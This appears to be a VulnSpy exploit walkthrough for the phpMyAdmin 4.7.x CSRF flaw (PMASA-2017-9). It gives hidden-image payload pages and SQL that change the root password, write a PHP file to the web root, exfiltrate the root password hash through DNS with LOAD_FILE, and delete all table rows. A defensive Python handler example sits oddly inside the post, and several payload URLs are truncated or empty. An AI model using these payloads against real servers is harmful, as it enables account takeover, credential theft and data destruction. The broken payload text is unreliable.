phpMyAdmin 4.7.x XSRF/CSRF vulnerability (PMASA-2017-9)

1 phpMyAdmin 4.7.x XSRF/CSRF Vulnerability (PMASA-2017-9)

phpMyAdmin is a well-known web-based MySQL/MariaDB management tool. The phpMyAdmin team released version 4.7.7 to address a CSRF vulnerability found by Barot (PMASA-2017-9). The vulnerability allows an attacker to execute an arbitrary SQL statement silently by inducing a logged-in administrator to visit a malicious page.

In this article, we will use VulnSpy's online phpMyAdmin environment to demonstrate exploitation of this vulnerability.

VulnSpy's online phpMyAdmin environment address:
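As an added defender-side illustration (not code from the original post and not phpMyAdmin's own implementation), the following Python model contrasts a handler that executes a query parameter on any authenticated request, which is what a hidden <img> on a third-party page triggers, with the same handler protected by a POST requirement and a per-session anti-CSRF token. The parameter name sql_query, the Session and Request types and the sample values are assumptions.

```python
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Dict, Optional


@dataclass
class Session:
    """Server-side session; the browser attaches it to every request via cookie."""
    user: str
    csrf_token: str = field(default_factory=lambda: secrets.token_hex(16))


@dataclass
class Request:
    method: str
    params: Dict[str, str]       # query-string or form fields
    session: Optional[Session]   # None when no valid cookie was sent


def vulnerable_handler(req: Request) -> str:
    """Runs 'sql_query' (assumed parameter name) for any authenticated request,
    GET included. A hidden <img src="..."> on a third-party page yields exactly
    such a GET with the victim's cookie attached, so the query runs as the admin."""
    if req.session is None:
        return "login required"
    query = req.params.get("sql_query")
    if not query:
        return "no query"
    return "executed: " + query


def hardened_handler(req: Request) -> str:
    """Same endpoint with the standard fix: state changes need POST plus a
    per-session token that a cross-origin page cannot read or guess."""
    if req.session is None:
        return "login required"
    if req.method != "POST":
        return "rejected: method not allowed"
    token = req.params.get("token", "")
    if not hmac.compare_digest(token, req.session.csrf_token):
        return "rejected: bad token"
    query = req.params.get("sql_query")
    if not query:
        return "no query"
    return "executed: " + query


# Constructed scenario: the request a hidden <img> on a malicious page produces
# while the admin's phpMyAdmin session cookie is still valid.
ADMIN = Session(user="root")
IMG_GET = Request("GET", {"sql_query": "SET password=PASSWORD('x')"}, ADMIN)
```

The vulnerable handler executes IMG_GET, the hardened one rejects it before the query is even read, and a legitimate POST carrying the session's own token still goes through.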

2 Exploit CSRF - Modifying the Password of the Current User

Change the password of the current user. SQL command:

SET password=PASSWORD('');

Exploit Demonstration

2.1 Log in to phpMyAdmin

Username: root Password: toor


2.2 Create a page with malicious code

Filename: 2.payload.html

<p>Hello World</p>
<img src="
%20=%20PASSWORD(" style="display:none;" />

2.3 Open the file 2.payload.html in the browser


Go back to phpMyAdmin: you will find that the session has been logged out automatically and the password of root has been changed.

2.payload.html 2

2.4 Log in successfully with the new password

Password Changed

3 Exploit CSRF - Arbitrary File Write

Write the code <?php phpinfo();?> to the file /var/www/html/test.php. SQL command:

select '<?php phpinfo();?>' into outfile '/var/www/html/test.php';

Exploit Demonstration

3.1 Payload

<p>Hello World</p>
<img src=" '<?php phpinfo();?>' into outfile '/var/www/html/test.php';" style="display:none;" />

3.2 Open the file containing the payload in the browser

3.3 Visit test.php


4 Exploit CSRF - Data Retrieval over DNS

Steal the password hash of root. SQL command:

SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'\\test'));

Fetch the current database name:

SELECT LOAD_FILE(CONCAT('\\\\',(SELECT database()),'\\test'));

VSPlate does not support this exploit.

5 Exploit CSRF - Empty All Rows From All Tables

Empty all rows from all tables. SQL command (body of a stored procedure):

    DECLARE i INT;
    SET i = 0;
    WHILE i < 100 DO
        SET @del = (SELECT CONCAT('DELETE FROM ',TABLE_SCHEMA,'.',TABLE_NAME) FROM information_schema.TABLES WHERE TABLE_SCHEMA NOT LIKE '%_schema' and TABLE_SCHEMA!='mysql' LIMIT i,1);
        PREPARE STMT FROM @del;
        EXECUTE STMT;
        SET i = i +1;
    END WHILE;
END $$


Exploit Demonstration

5.1 Payload

<p>Hello World</p>
<img src="" style="display:none;" />

5.2 Open the file containing the payload in the browser

5.3 Go back to phpMyAdmin

You will find that the data in the databases vulnspy_tables and vulnspy_test has been deleted.

Empty DBS

GitHub Source


PMASA-2017-9
CSRF Vulnerability in phpMyAdmin allows attackers to perform DROP TABLE with a single click!
phpMyAdmin 4.7.x XSRF/CSRF Vulnerability (PMASA-2017-9) Exploit
phpMyAdmin 4.7.x CSRF Exploit

All rights reserved. © 2021 VULNSPY